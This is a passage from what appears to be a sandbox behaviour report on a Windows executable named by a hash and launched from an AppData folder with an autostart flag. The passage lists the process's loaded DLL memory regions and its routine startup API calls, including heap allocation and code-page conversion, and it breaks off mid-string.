0x74b4ffff monitored = 0 entry_point = 0x74b0a3b3 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\SysWOW64\\sspicli.dll" (normalized: "c:\\windows\\syswow64\\sspicli.dll") Region: id = 1875 start_va = 0x74ae0000 end_va = 0x74aebfff monitored = 0 entry_point = 0x74ae10e1 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\SysWOW64\\cryptbase.dll" (normalized: "c:\\windows\\syswow64\\cryptbase.dll") Region: id = 1876 start_va = 0x210000 end_va = 0x26ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000210000" filename = "" Region: id = 1877 start_va = 0x20000 end_va = 0x3dfff monitored = 0 entry_point = 0x3158f region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Region: id = 1878 start_va = 0x27a0000 end_va = 0x2927fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000027a0000" filename = "" Region: id = 1879 start_va = 0x20000 end_va = 0x3dfff monitored = 0 entry_point = 0x3158f region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Region: id = 1880 start_va = 0x75510000 end_va = 0x7556ffff monitored = 0 entry_point = 0x7552158f region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Region: id = 1881 start_va = 0x753b0000 end_va = 0x7547bfff monitored = 0 entry_point = 0x753b168b region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\SysWOW64\\msctf.dll" (normalized: "c:\\windows\\syswow64\\msctf.dll") Region: id = 1882 start_va = 0x20000 end_va = 0x20fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 1883 start_va = 0x30000 end_va = 0x30fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 1884 start_va = 0x2930000 end_va = 0x2ab0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002930000" filename = "" Region: id = 1885 start_va = 0x2ac0000 end_va = 0x3ebffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002ac0000" filename = "" Region: id = 1886 start_va = 0x3ec0000 end_va = 0x403ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003ec0000" filename = "" Region: id = 1887 start_va = 0x2540000 end_va = 0x25d1fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002540000" filename = "" Region: id = 1888 start_va = 0x26a0000 end_va = 0x279ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000026a0000" filename = "" Region: id = 1889 start_va = 0x4040000 end_va = 0x444ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004040000" filename = "" Region: id = 1890 start_va = 0x210000 end_va = 0x214fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000210000" filename = "" Region: id = 1891 start_va = 0x260000 end_va = 0x26ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000260000" filename = "" Region: id = 1892 start_va = 0x210000 end_va = 0x214fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000210000" filename = "" Region: id = 1893 start_va = 0x3ec0000 end_va = 0x3fdafff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003ec0000" filename = "" Region: id = 1894 start_va = 0x4030000 end_va = 0x403ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004030000" filename = "" Region: id = 1895 start_va = 0x74a50000 end_va = 0x74acffff monitored = 0 entry_point = 0x74a637c9 region_type = mapped_file name = "uxtheme.dll" filename = "\\Windows\\SysWOW64\\uxtheme.dll" (normalized: "c:\\windows\\syswow64\\uxtheme.dll") Region: id = 1896 start_va = 0x4040000 end_va = 0x41cffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004040000" filename = "" Region: id = 1897 start_va = 0x4040000 end_va = 0x411efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004040000" filename = "" Region: id = 1898 start_va = 0x4190000 end_va = 0x41cffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004190000" filename = "" Region: id = 1899 start_va = 0x74a30000 end_va = 0x74a42fff monitored = 0 entry_point = 0x74a31d3f region_type = mapped_file name = "dwmapi.dll" filename = "\\Windows\\SysWOW64\\dwmapi.dll" (normalized: "c:\\windows\\syswow64\\dwmapi.dll") Region: id = 1900 start_va = 0x210000 end_va = 0x212fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000210000" filename = "" Region: id = 1917 start_va = 0x210000 end_va = 0x210fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000210000" filename = "" Thread: id = 106 os_tid = 0x76c [0168.569] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18ff7c | out: lpSystemTimeAsFileTime=0x18ff7c*(dwLowDateTime=0xdf65d3e0, dwHighDateTime=0x1d8a8d3)) [0168.569] GetCurrentProcessId () returned 0x768 [0168.569] GetCurrentThreadId () returned 0x76c [0168.569] GetTickCount () returned 0x7a2d [0168.569] QueryPerformanceCounter (in: lpPerformanceCount=0x18ff74 | out: lpPerformanceCount=0x18ff74*=2065486283749) returned 1 [0168.570] GetStartupInfoW (in: lpStartupInfo=0x18ff20 | out: lpStartupInfo=0x18ff20*(cb=0x44, lpReserved="", lpDesktop="Winsta0\\Default", lpTitle="C:\\Users\\kEecfMwgj\\AppData\\Local\\fa1eafca-d2cd-4c04-a099-4159a69291ac\\0336cc8aff0e4974ede9e8901abeb10f836d50619cef1cb59aa41b447cea1ca5.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x18ff84, hStdError=0x49ed70)) [0168.570] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0168.570] HeapCreate (flOptions=0x0, dwInitialSize=0x1000, dwMaximumSize=0x0) returned 0x4030000 [0168.572] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76600000 [0168.572] GetProcAddress (hModule=0x76600000, lpProcName="FlsAlloc") returned 0x76614ee3 [0168.572] GetProcAddress (hModule=0x76600000, lpProcName="FlsGetValue") returned 0x76611252 [0168.572] GetProcAddress (hModule=0x76600000, lpProcName="FlsSetValue") returned 0x766141c0 [0168.572] GetProcAddress (hModule=0x76600000, lpProcName="FlsFree") returned 0x7661354f [0168.574] RtlAllocateHeap (HeapHandle=0x4030000, Flags=0x8, Size=0x214) returned 0x40307d0 [0168.575] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76600000 [0168.575] GetCurrentThreadId () returned 0x76c [0168.575] GetStartupInfoW (in: lpStartupInfo=0x18febc | out: lpStartupInfo=0x18febc*(cb=0x44, lpReserved="", lpDesktop="Winsta0\\Default", lpTitle="C:\\Users\\kEecfMwgj\\AppData\\Local\\fa1eafca-d2cd-4c04-a099-4159a69291ac\\0336cc8aff0e4974ede9e8901abeb10f836d50619cef1cb59aa41b447cea1ca5.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x49a656, hStdOutput=0x49a98f, hStdError=0x40307d0)) [0168.575] RtlAllocateHeap (HeapHandle=0x4030000, Flags=0x8, Size=0x800) returned 0x40309f0 [0168.576] GetStdHandle (nStdHandle=0xfffffff6) returned 0x0 [0168.576] GetStdHandle (nStdHandle=0xfffffff5) returned 0x0 [0168.576] GetStdHandle (nStdHandle=0xfffffff4) returned 0x0 [0168.576] SetHandleCount (uNumber=0x20) returned 0x20 [0168.576] GetCommandLineW () returned="\"C:\\Users\\kEecfMwgj\\AppData\\Local\\fa1eafca-d2cd-4c04-a099-4159a69291ac\\0336cc8aff0e4974ede9e8901abeb10f836d50619cef1cb59aa41b447cea1ca5.exe\" --AutoStart" [0168.576] GetEnvironmentStringsW () returned 0x26b2108* [0168.576] RtlAllocateHeap (HeapHandle=0x4030000, Flags=0x0, Size=0xb46) returned 0x40311f8 [0168.578] FreeEnvironmentStringsW (penv=0x26b2108) returned 1 [0168.578] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x252b980, nSize=0x104 | out: lpFilename="C:\\Users\\kEecfMwgj\\AppData\\Local\\fa1eafca-d2cd-4c04-a099-4159a69291ac\\0336cc8aff0e4974ede9e8901abeb10f836d50619cef1cb59aa41b447cea1ca5.exe" (normalized: "c:\\users\\keecfmwgj\\appdata\\local\\fa1eafca-d2cd-4c04-a099-4159a69291ac\\0336cc8aff0e4974ede9e8901abeb10f836d50619cef1cb59aa41b447cea1ca5.exe")) returned 0x8a [0168.578] RtlAllocateHeap (HeapHandle=0x4030000, Flags=0x0, Size=0x13a) returned 0x4031d48 [0168.578] RtlAllocateHeap (HeapHandle=0x4030000, Flags=0x8, Size=0x9c) returned 0x4031e90 [0168.578] RtlAllocateHeap (HeapHandle=0x4030000, Flags=0x8, Size=0x3e) returned 0x4031f38 [0168.578] RtlAllocateHeap (HeapHandle=0x4030000, Flags=0x8, Size=0x56) returned 0x4031f80 [0168.578] RtlAllocateHeap (HeapHandle=0x4030000, Flags=0x8, Size=0x6e) returned 0x4031fe8 [0168.578] RtlAllocateHeap (HeapHandle=0x4030000, Flags=0x8, Size=0x78) returned 0x4032060 [0168.578] RtlAllocateHeap (HeapHandle=0x4030000, Flags=0x8, Size=0x62) returned 0x40320e0 [0168.578] RtlAllocateHeap (HeapHandle=0x4030000, Flags=0x8, Size=0x30) returned 0x4032150 [0168.578] RtlAllocateHeap (HeapHandle=0x4030000, Flags=0x8, Size=0x48) returned 0x4032188 [0168.578] RtlAllocateHeap (HeapHandle=0x4030000, Flags=0x8, Size=0x28) returned 0x40321d8 [0168.578] RtlAllocateHeap (HeapHandle=0x4030000, Flags=0x8, Size=0x1a) returned 0x4032208 [0168.578] RtlAllocateHeap (HeapHandle=0x4030000, Flags=0x8, Size=0x34) returned 0x4032230 [0168.579] RtlAllocateHeap (HeapHandle=0x4030000, Flags=0x8, Size=0x5c) returned 0x4032270 [0168.579] RtlAllocateHeap (HeapHandle=0x4030000, Flags=0x8, Size=0x32) returned 0x40322d8 [0168.579] RtlAllocateHeap (HeapHandle=0x4030000, Flags=0x8, Size=0x2e) returned 0x4032318 [0168.579] RtlAllocateHeap (HeapHandle=0x4030000, Flags=0x8, Size=0x1c) returned 0x4032350 [0168.579] RtlAllocateHeap (HeapHandle=0x4030000, Flags=0x8, Size=0x12a) returned 0x4032378 [0168.579] RtlAllocateHeap (HeapHandle=0x4030000, Flags=0x8, Size=0x7c) returned 0x40324b0 [0168.579] RtlAllocateHeap (HeapHandle=0x4030000, Flags=0x8, Size=0x36) returned 0x4032538 [0168.579] RtlAllocateHeap (HeapHandle=0x4030000, Flags=0x8, Size=0x3a) returned 0x4032578 [0168.579] RtlAllocateHeap (HeapHandle=0x4030000, Flags=0x8, Size=0x90) returned 0x40325c0 [0168.579] RtlAllocateHeap (HeapHandle=0x4030000, Flags=0x8, Size=0x24) returned 0x4032658 [0168.579] RtlAllocateHeap (HeapHandle=0x4030000, Flags=0x8, Size=0x30) returned 0x4032688 [0168.579] RtlAllocateHeap (HeapHandle=0x4030000, Flags=0x8, Size=0x36) returned 0x40326c0 [0168.579] RtlAllocateHeap (HeapHandle=0x4030000, Flags=0x8, Size=0x48) returned 0x4032700 [0168.579] RtlAllocateHeap (HeapHandle=0x4030000, Flags=0x8, Size=0x52) returned 0x4032750 [0168.579] RtlAllocateHeap (HeapHandle=0x4030000, Flags=0x8, Size=0x3c) returned 0x40327b0 [0168.579] RtlAllocateHeap (HeapHandle=0x4030000, Flags=0x8, Size=0xd6) returned 0x40327f8 [0168.579] RtlAllocateHeap (HeapHandle=0x4030000, Flags=0x8, Size=0x2e) returned 0x40328d8 [0168.579] RtlAllocateHeap (HeapHandle=0x4030000, Flags=0x8, Size=0x28) returned 0x4032910 [0168.579] RtlAllocateHeap (HeapHandle=0x4030000, Flags=0x8, Size=0x1e) returned 0x4032940 [0168.579] RtlAllocateHeap (HeapHandle=0x4030000, Flags=0x8, Size=0x2c) returned 0x4032968 [0168.579] RtlAllocateHeap (HeapHandle=0x4030000, Flags=0x8, Size=0x54) returned 0x40329a0 [0168.579] RtlAllocateHeap (HeapHandle=0x4030000, Flags=0x8, Size=0x52) returned 0x4032a00 [0168.579] RtlAllocateHeap (HeapHandle=0x4030000, Flags=0x8, Size=0x2c) returned 0x4032a60 [0168.579] RtlAllocateHeap (HeapHandle=0x4030000, Flags=0x8, Size=0x26) returned 0x4032a98 [0168.579] RtlAllocateHeap (HeapHandle=0x4030000, Flags=0x8, Size=0x3e) returned 0x4032ac8 [0168.579] RtlAllocateHeap (HeapHandle=0x4030000, Flags=0x8, Size=0x24) returned 0x4032b10 [0168.579] RtlAllocateHeap (HeapHandle=0x4030000, Flags=0x8, Size=0x30) returned 0x4032b40 [0168.580] RtlAllocateHeap (HeapHandle=0x4030000, Flags=0x8, Size=0x8c) returned 0x4032b78 [0168.591] HeapFree (in: hHeap=0x4030000, dwFlags=0x0, lpMem=0x40311f8 | out: hHeap=0x4030000) returned 1 [0168.592] IsProcessorFeaturePresent (ProcessorFeature=0xa) returned 1 [0168.592] RtlAllocateHeap (HeapHandle=0x4030000, Flags=0x8, Size=0x80) returned 0x4032c10 [0168.592] RtlAllocateHeap (HeapHandle=0x4030000, Flags=0x8, Size=0x800) returned 0x40311f8 [0168.592] GetLastError () returned 0x0 [0168.592] SetLastError (dwErrCode=0x0) [0168.592] GetLastError () returned 0x0 [0168.593] SetLastError (dwErrCode=0x0) [0168.593] GetLastError () returned 0x0 [0168.593] SetLastError (dwErrCode=0x0) [0168.593] GetACP () returned 0x4e4 [0168.593] RtlAllocateHeap (HeapHandle=0x4030000, Flags=0x0, Size=0x220) returned 0x4031a00 [0168.593] GetLastError () returned 0x0 [0168.593] SetLastError (dwErrCode=0x0) [0168.593] IsValidCodePage (CodePage=0x4e4) returned 1 [0168.593] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x18fe84 | out: lpCPInfo=0x18fe84) returned 1 [0168.593] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x18f950 | out: lpCPInfo=0x18f950) returned 1 [0168.593] GetLastError () returned 0x0 [0168.593] SetLastError (dwErrCode=0x0) [0168.593] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18fd64, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0168.593] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18fd64, cbMultiByte=256, lpWideCharStr=0x18f6c8, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ") returned 256 [0168.593] GetStringTypeW (in: dwInfoType=0x1, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchSrc=256, lpCharType=0x18f964 | out: lpCharType=0x18f964) returned 1 [0168.593] GetLastError () returned 0x0 [0168.594] SetLastError (dwErrCode=0x0) [0168.594] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18fd64, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0168.594] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18fd64, cbMultiByte=256, lpWideCharStr=0x18f698, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ왅繂ᨤJĀ") returned 256 [0168.594] LCMapStringW (in: Locale=0x0, dwMapFlags=0x100, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ왅繂ᨤJĀ", cchSrc=256, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 256 [0168.594] LCMapStringW (in: Locale=0x0, dwMapFlags=0x100, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ왅繂ᨤJĀ", cchSrc=256, lpDestStr=0x18f488, cchDest=256 | out: lpDestStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰š‹œ\x8dž\x8f\x90‘’“”•–—˜™š›œ\x9džÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿЀ") returned 256 [0168.594] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰š‹œ\x8dž\x8f\x90‘’“”•–—˜™š›œ\x9džÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿЀ", cchWideChar=256, lpMultiByteStr=0x18fc64, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x9a\x8b\x9c\x8d\x9e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9eÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ·r\x11\x0b\x9cþ\x18", lpUsedDefaultChar=0x0) returned 256 [0168.594] GetLastError () returned 0x0 [0168.594] SetLastError (dwErrCode=0x0) [0168.594] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18fd64, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0168.594] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18fd64, cbMultiByte=256, lpWideCharStr=0x18f6b8, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ왅繂ᨤJĀ") returned 256 [0168.594] LCMapStringW (in: Locale=0x0, dwMapFlags=0x200, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ왅繂ᨤJĀ", cchSrc=256, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 256 [0168.594] LCMapStringW (in: Locale=0x0, dwMapFlags=0x200, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ왅繂ᨤJĀ", cchSrc=256, lpDestStr=0x18f4a8, cchDest=256 | out: lpDestStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f€\x81‚Ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™Š›Œ\x9dŽŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞŸЀ") returned 256 [0168.594] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f€\x81‚Ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™Š›Œ\x9dŽŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞŸЀ", cchWideChar=256, lpMultiByteStr=0x18fb64, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x8a\x9b\x8c\x9d\x8e\x9f 